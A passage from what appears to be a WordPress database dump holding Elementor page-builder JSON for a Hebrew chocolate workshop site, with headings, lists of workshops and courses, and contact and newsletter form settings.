\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a330bc8\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5b761419\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e0c5e0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1c71ccd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"786d6b73\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b8f8c19\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"388c6046\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6bd4621c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c50c739\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"129cbc32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"75b11280\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f0bfe06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5dfe763\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1217,243,'_elementor_version','0.4'),(1218,243,'_elementor_template_type','post'),(1226,167,'_elementor_template_type','wp-post'),(1228,245,'_wp_page_template','elementor_header_footer'),(1229,245,'_elementor_edit_mode','builder'),(1230,245,'_elementor_data','[{\"id\":\"4a34667\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f9f9337\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"972ca81\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d4\\u05de\\u05d2\\u05d6\\u05d9\\u05df \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e467453\",\"elType\":\"widget\",\"settings\":{\"weight\":{\"unit\":\"px\",\"size\":4},\"width\":{\"unit\":\"%\",\"size\":42},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"bc8044c\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_show_excerpt\":\"\",\"cards_meta_data\":[],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"\\u05dc\\u05e7\\u05e8\\u05d9\\u05d0\\u05d4 \\u00bb\",\"cards_show_avatar\":\"\",\"offset\":\"\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"595c4b79\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"55a018\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"42ec654b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7032c8d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"68bbbdb2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"262a9cad\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"1c80b63c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"269f0e2a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7d91b4cb\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"50ee25e1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7235e8ee\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"27c53cbf\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e7c936f\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is 